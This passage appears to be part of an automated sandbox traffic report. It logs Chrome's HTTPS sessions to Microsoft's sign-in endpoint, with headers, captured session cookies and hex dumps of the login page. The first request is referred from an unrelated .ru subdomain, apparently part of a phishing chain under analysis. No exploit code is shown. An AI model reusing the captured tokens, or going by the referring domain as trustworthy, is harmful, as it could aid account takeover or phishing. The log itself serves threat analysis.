                                                                        Location: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                        Set-Cookie: OH.DCAffinity=OH-eus; expires=Thu, 16 Jan 2025 16:20:37 GMT; path=/; secure; samesite=none; httponly
                                                                        Set-Cookie: OH.FLID=4447997c-0180-4662-a892-9d85bb15168a; expires=Fri, 16 Jan 2026 08:20:37 GMT; path=/; secure; samesite=none; httponly
                                                                        Set-Cookie: OH.SID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
                                                                        Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.QfEmvKrdY65JGErWJXxC9kAdOaV6S3DoWnkM-pcrdAy8yfvusoGk0DY7LC_pSXG-8J804ZBHdVGJVJL1E1-h3fO-28-QLHA8Y0FwcsgA_smh25lGobob-_t_pi7per1pYX5rvGTehZYnNvbJBpIiD5JrNntF5qT2E0puzbS65vaSOEMIw-Tswf2EQxB0XOcHIP_nKKRZo-svngHaAqGvC4yTGZRiYeI5e68IKvQp5J38YceV3OKbJiNq5crJHUc8=N; expires=Thu, 16 Jan 2025 08:35:37 GMT; path=/; secure; samesite=none; httponly
                                                                        Set-Cookie: .AspNetCore.Correlation.lvqL_Vrmj7vfDQZ3C7vU7VOZYdqMDw907LTzQ4fg2aA=N; expires=Thu, 16 Jan 2025 08:35:37 GMT; path=/; secure; samesite=none; httponly
                                                                        Request-Context: appId=
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-UA-Compatible: IE=edge,chrome=1
                                                                        X-Cache: CONFIG_NOCACHE
                                                                        X-MSEdge-Ref: Ref A: 6BB45BEAE5CC4168BF334EBC07781904 Ref B: EWR311000107009 Ref C: 2025-01-16T08:20:37Z
                                                                        Date: Thu, 16 Jan 2025 08:20:36 GMT
                                                                        Connection: close
                                                                        Content-Length: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.54981320.190.160.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:37 UTC1808OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1
                                                                        Host: login.microsoftonline.com
                                                                        Connection: keep-alive
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                                        2025-01-16 08:20:37 UTC1856INHTTP/1.1 200 OK
                                                                        Cache-Control: no-store, no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Expires: -1
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        X-Content-Type-Options: nosniff
                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                        x-ms-request-id: e50d9f9a-4935-4bc0-baa0-6111c06d0900
                                                                        x-ms-ests-server: 2.1.19870.3 - FRC ProdSlices
                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                        x-ms-clitelem: 1,50168,0,,
                                                                        x-ms-srs: 1.P
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-Hy6Hx5MD8ztg6u3VYR95vw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                        X-XSS-Protection: 0
                                                                        Set-Cookie: esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; expires=Sat, 15-Feb-2025 08:20:37 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                        Date: Thu, 16 Jan 2025 08:20:37 GMT
                                                                        Connection: close
                                                                        Content-Length: 21362
                                                                        2025-01-16 08:20:37 UTC14528INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                        Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head> <title>Redirecting</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                        2025-01-16 08:20:37 UTC6834INData Raw: 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 46 61 69 6c 65 64 22 2c 65 29 3b 76 61 72 20 75 3d 6e 65 77 20 63 3b 75 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 75 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 53 75 63 63 65 73 73 22 2c 75 2e 41 64 64 46 6f 72 52 65 6c 6f 61 64 28 65 2c 74 29 2c 0a 75 2e 4c 6f 61 64 28 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6f 29 7b 74 68 72 6f 77 22 46 61 69 6c 65 64 20 74 6f 20 6c 6f 61 64 20 65 78 74 65 72 6e 61 6c 20 72 65 73 6f 75 72 63 65 20 5b
                                                                        Data Ascii: {throw"The target element must be provided and cannot be null."}r("[$Loader]: Failed",e);var u=new c;u.failMessage="Reload Failed",u.successMessage="Reload Success",u.AddForReload(e,t),u.Load(null,function(){if(o){throw"Failed to load external resource [


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.54983820.190.160.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:39 UTC1948OUTGET /favicon.ico HTTP/1.1
                                                                        Host: login.microsoftonline.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                        2025-01-16 08:20:40 UTC1336INHTTP/1.1 404 Not Found
                                                                        Cache-Control: private
                                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        X-Content-Type-Options: nosniff
                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                        x-ms-request-id: 95ee8bcc-1631-4a79-a238-d48ee0feaf00
                                                                        x-ms-ests-server: 2.1.19870.3 - SEC ProdSlices
                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                        x-ms-srs: 1.P
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-K-g14_FQms7AXCo0Y_q_ZA' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                        X-XSS-Protection: 0
                                                                        Date: Thu, 16 Jan 2025 08:20:39 GMT
                                                                        Connection: close
                                                                        Content-Length: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.54983920.190.160.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:39 UTC2850OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1
                                                                        Host: login.microsoftonline.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-Dest: document
                                                                        Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                        2025-01-16 08:20:40 UTC2686INHTTP/1.1 200 OK
                                                                        Cache-Control: no-store, no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Expires: -1
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: DENY
                                                                        Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                        X-DNS-Prefetch-Control: on
                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                        x-ms-request-id: 22619617-7e2e-435a-ae36-53d523270b00
                                                                        x-ms-ests-server: 2.1.19870.3 - NEULR1 ProdSlices
                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                        x-ms-clitelem: 1,0,0,,
                                                                        x-ms-srs: 1.P
                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-sYFlHUevXAfDmWTLHO2xnA' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                        X-XSS-Protection: 0
                                                                        Set-Cookie: buid=1.AQsAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAALAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEJDMrX0k616j2yDvbuUA1HY3zsMsNLE89Mnk8TQD2ucaBj2uyTgq0kZWxq_B81JVAK9hIlD1zaPLdrE6h0u-xBliseFecQTU7oMpt3rck68IgAA; expires=Sat, 15-Feb-2025 08:20:39 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEGHYAiUQEnH7sguqyW8P4fXdVFnlmqARlDDyZoE59darIpPE1mXszsunDkhJWDaYoULRegB8gDCyttKPnib7i7DzquwwyNTRrmhbjxaUvw_NBr-gt-sHT8LBSOPjXdZ4r_BvXVOWm_tOkkDAFvoUeezRrwacbjDunBBDvVxJlHccgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: esctx-qRVTTDWdaSg=AQABCQEAAABVrSpeuWamRam2jAF1XRQEc3xvgGwDLDvfMguJbW3YSGmUUoC5-ppJnVE6DAAfKhhz_EHPN0lufitC0TtszwEA7cS_p4zybbdneMPs7wUVFhuaEQ0QxY4LObRmiN0hHgUauuwICfXXynAAoOcVAkR6iEnL-LscAOs4k6Jubt11lSAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488K8Ae7AAQAAAFe4Gt8OAAAA; expires=Sat, 15-Feb-2025 08:20:39 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                        Date: Thu, 16 Jan 2025 08:20:39 GMT
                                                                        Connection: close
                                                                        Content-Length: 46568
                                                                        2025-01-16 08:20:40 UTC13698INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20
                                                                        Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
                                                                        2025-01-16 08:20:40 UTC16384INData Raw: 6d 62 69 67 52 65 6e 61 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 70 2f 3f 4c 69 6e 6b 49 44 3d 37 33 33 32 34 37 22 2c 22 75 72 6c 47 6f 54 6f 41 41 44 45 72 72 6f 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 69 76 65 2e 63 6f 6d 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32
                                                                        Data Ascii: mbigRename":"https://go.microsoft.com/fwlink/p/?LinkID=733247","urlGoToAADError":"https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All\u002
                                                                        2025-01-16 08:20:40 UTC16384INData Raw: 22 61 75 74 6f 50 6f 73 74 44 65 6c 61 79 22 3a 31 30 30 30 2c 22 6d 69 6e 45 76 65 6e 74 73 22 3a 31 2c 22 6d 61 78 45 76 65 6e 74 73 22 3a 31 2c 22 70 6c 74 44 65 6c 61 79 22 3a 35 30 30 2c 22 61 70 70 49 6e 73 69 67 68 74 73 43 6f 6e 66 69 67 22 3a 7b 22 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 4b 65 79 22 3a 22 62 30 63 32 35 32 38 30 38 65 36 31 34 65 39 34 39 30 38 36 65 30 31 39 61 65 31 63 62 33 30 30 2d 65 30 63 30 32 30 36 30 2d 65 33 62 33 2d 34 39 36 35 2d 62 64 37 63 2d 34 31 35 65 31 61 37 61 39 66 64 65 2d 36 39 35 31 22 2c 22 77 65 62 41 6e 61 6c 79 74 69 63 73 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 22 3a 7b 22 61 75 74 6f 43 61 70 74 75 72 65 22 3a 7b 22 6a 73 45 72 72 6f 72 22 3a 74 72 75 65 7d 7d 7d 2c 22 64 65 66 61 75 6c 74 45 76
                                                                        Data Ascii: "autoPostDelay":1000,"minEvents":1,"maxEvents":1,"pltDelay":500,"appInsightsConfig":{"instrumentationKey":"b0c252808e614e949086e019ae1cb300-e0c02060-e3b3-4965-bd7c-415e1a7a9fde-6951","webAnalyticsConfiguration":{"autoCapture":{"jsError":true}}},"defaultEv
                                                                        2025-01-16 08:20:40 UTC102INData Raw: 61 6d 65 2d 72 65 71 75 65 73 74 2d 69 64 3d 22 2b 69 2e 73 65 73 73 69 6f 6e 49 64 2b 6f 2e 73 75 62 73 74 72 28 6e 29 2c 65 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 6f 7d 7d 7d 28 29 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: ame-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();//...</script> </body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.54995720.190.160.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
